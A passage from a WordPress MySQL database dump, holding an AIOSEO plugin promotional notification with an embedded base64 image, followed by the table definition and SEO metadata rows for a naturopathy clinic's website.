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\" alt=\"\" class=\"wp-image-1440\"/>\n\n<p>Celebrate this Memorial Day with up to 60% off all AIOSEO plans and upgrades. 🎉</p>\n\n<p>If you\'ve been meaning to unlock more powerful SEO tools, consider this your sign. Real-time SEO scoring for every post. AI writing tools inside WordPress. Automatic redirect management and schema markup. Rich snippets without code.</p>\n\n<p>AIOSEO makes SEO easy, so you can focus on what matters most: growing your business.</p>\n\n<p>Limited-time deal. ⏳</p>','success','[\"4-x\",\"lite\"]',1439,NULL,'2026-05-25 00:00:00','2026-05-27 00:00:00','Get AIOSEO Pro','https://aioseo.com/pricing/?utm_source=WordPress&utm_medium=plugin-notification&utm_campaign=memorial-day-2026-v4-x-lite',NULL,NULL,0,0,'2026-05-20 05:14:43','2026-05-20 05:14:43'); /*!40000 ALTER TABLE `wpln_aioseo_notifications` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_aioseo_posts` -- DROP TABLE IF EXISTS `wpln_aioseo_posts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_aioseo_posts` ( `id` bigint unsigned NOT NULL AUTO_INCREMENT, `post_id` bigint unsigned NOT NULL, `title` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `description` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `keywords` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `keyphrases` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `page_analysis` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `canonical_url` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `og_title` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `og_description` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `og_object_type` varchar(64) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT 'default', `og_image_type` varchar(64) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT 'default', `og_image_url` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `og_image_width` int DEFAULT NULL, `og_image_height` int DEFAULT NULL, `og_image_custom_url` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `og_image_custom_fields` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `og_video` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL, `og_custom_url` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `og_article_section` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `og_article_tags` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `twitter_use_og` tinyint(1) DEFAULT '0', `twitter_card` varchar(64) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT 'default', `twitter_image_type` varchar(64) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT 'default', `twitter_image_url` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `twitter_image_custom_url` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `twitter_image_custom_fields` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `twitter_title` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `twitter_description` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `seo_score` int NOT NULL DEFAULT '0', `schema_type` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT 'default', `schema_type_options` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `pillar_content` tinyint(1) DEFAULT NULL, `robots_default` tinyint(1) NOT NULL DEFAULT '1', `robots_noindex` tinyint(1) NOT NULL DEFAULT '0', `robots_noarchive` tinyint(1) NOT NULL DEFAULT '0', `robots_nosnippet` tinyint(1) NOT NULL DEFAULT '0', `robots_nofollow` tinyint(1) NOT NULL DEFAULT '0', `robots_noimageindex` tinyint(1) NOT NULL DEFAULT '0', `robots_noodp` tinyint(1) NOT NULL DEFAULT '0', `robots_notranslate` tinyint(1) NOT NULL DEFAULT '0', `robots_max_snippet` int DEFAULT NULL, `robots_max_videopreview` int DEFAULT NULL, `robots_max_imagepreview` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT 'large', `tabs` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `images` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `image_scan_date` datetime DEFAULT NULL, `priority` tinytext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `frequency` tinytext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `videos` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `video_thumbnail` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `video_scan_date` datetime DEFAULT NULL, `local_seo` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, `limit_modified_date` tinyint(1) NOT NULL DEFAULT '0', `created` datetime NOT NULL, `updated` datetime NOT NULL, PRIMARY KEY (`id`), KEY `ndx_aioseo_posts_post_id` (`post_id`) ) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_aioseo_posts` -- LOCK TABLES `wpln_aioseo_posts` WRITE; /*!40000 ALTER TABLE `wpln_aioseo_posts` DISABLE KEYS */; INSERT INTO `wpln_aioseo_posts` (`id`, `post_id`, `title`, `description`, `keywords`, `keyphrases`, `page_analysis`, `canonical_url`, `og_title`, `og_description`, `og_object_type`, `og_image_type`, `og_image_url`, `og_image_width`, `og_image_height`, `og_image_custom_url`, `og_image_custom_fields`, `og_video`, `og_custom_url`, `og_article_section`, `og_article_tags`, `twitter_use_og`, `twitter_card`, `twitter_image_type`, `twitter_image_url`, `twitter_image_custom_url`, `twitter_image_custom_fields`, `twitter_title`, `twitter_description`, `seo_score`, `schema_type`, `schema_type_options`, `pillar_content`, `robots_default`, `robots_noindex`, `robots_noarchive`, `robots_nosnippet`, `robots_nofollow`, `robots_noimageindex`, `robots_noodp`, `robots_notranslate`, `robots_max_snippet`, `robots_max_videopreview`, `robots_max_imagepreview`, `tabs`, `images`, `image_scan_date`, `priority`, `frequency`, `videos`, `video_thumbnail`, `video_scan_date`, `local_seo`, `limit_modified_date`, `created`, `updated`) VALUES (1,28,'Verde Naturopathy','Kalamunda Naturopath providing holistic healing and herbal medicine','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"The content is below the minimum of words. Add more content.\",\"score\":6,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"You are linking to other resources on your website which is great.\",\"score\":9,\"maxScore\":9,\"error\":0},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":0,\"title\":\"Images\\/videos in content\",\"description\":\"Your content contains images and\\/or video(s).\",\"score\":5,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":{\"title\":\"Transition words\",\"description\":\"Only 3.8% of the sentences contain transition words, which is not enough. Use more of them.\",\"score\":3,\"maxScore\":9,\"error\":1},\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"Great job!\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 23.6 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'website','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,71,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}','[{\"image:loc\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2021\\/05\\/IMG_20210503_205936_105.jpg\",\"image:title\":\"IMG_20210503_205936_105\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2021\\/05\\/IMG_20200714_175859_865.jpg\",\"image:title\":\"IMG_20200714_175859_865\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2021\\/08\\/IMG_20210701_202413_037.jpg\",\"image:title\":\"IMG_20210701_202413_037\",\"image:caption\":\"\"}]','2025-10-20 06:29:24','default','default',NULL,NULL,NULL,NULL,0,'2022-05-02 11:18:39','2025-10-20 06:29:24'),(8,424,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is over 160 characters.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"The content is below the minimum of words. Add more content.\",\"score\":6,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"You are linking to other resources on your website which is great.\",\"score\":9,\"maxScore\":9,\"error\":0},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":0,\"title\":\"Images\\/videos in content\",\"description\":\"Your content contains images and\\/or video(s).\",\"score\":5,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":{\"title\":\"Transition words\",\"description\":\"Only 4.8% of the sentences contain transition words, which is not enough. Use more of them.\",\"score\":3,\"maxScore\":9,\"error\":1},\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"Great job!\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 43.1 in the test, which is considered difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,71,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}','[{\"image:loc\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2021\\/05\\/4-01.png\",\"image:title\":\"4-01\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2021\\/05\\/3-01.png\",\"image:title\":\"3-01\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2021\\/05\\/2-01.png\",\"image:title\":\"2-01\",\"image:caption\":\"\"}]','2026-02-19 05:25:28','default','default',NULL,NULL,NULL,NULL,0,'2025-04-01 11:55:12','2026-02-19 05:25:28'),(2,2,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-05-02 11:19:24',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-05-02 11:19:24','2022-05-02 11:19:24'),(3,3,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-05-02 11:19:24',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-05-02 11:19:24','2022-05-02 11:19:24'),(4,25,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-05-02 11:19:24',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-05-02 11:19:24','2022-05-02 11:19:24'),(5,26,NULL,NULL,'[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is over 160 characters.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"The content length is ok. Good job!\",\"score\":9,\"maxScore\":9,\"error\":0},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"You are linking to other resources on your website which is great.\",\"score\":9,\"maxScore\":9,\"error\":0},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":{\"title\":\"Transition words\",\"description\":\"Only 1.5% of the sentences contain transition words, which is not enough. Use more of them.\",\"score\":3,\"maxScore\":9,\"error\":1},\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"Great job!\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,72,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2025-10-20 06:29:24','default','default',NULL,NULL,NULL,NULL,0,'2022-05-02 11:19:24','2025-10-20 06:29:24'),(6,27,NULL,NULL,'[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is over 160 characters.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"The content is below the minimum of words. Add more content.\",\"score\":6,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"You are linking to other resources on your website which is great.\",\"score\":9,\"maxScore\":9,\"error\":0},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":0,\"title\":\"Images\\/videos in content\",\"description\":\"Your content contains images and\\/or video(s).\",\"score\":5,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":{\"title\":\"Transition words\",\"description\":\"Only 4.3% of the sentences contain transition words, which is not enough. Use more of them.\",\"score\":3,\"maxScore\":9,\"error\":1},\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading 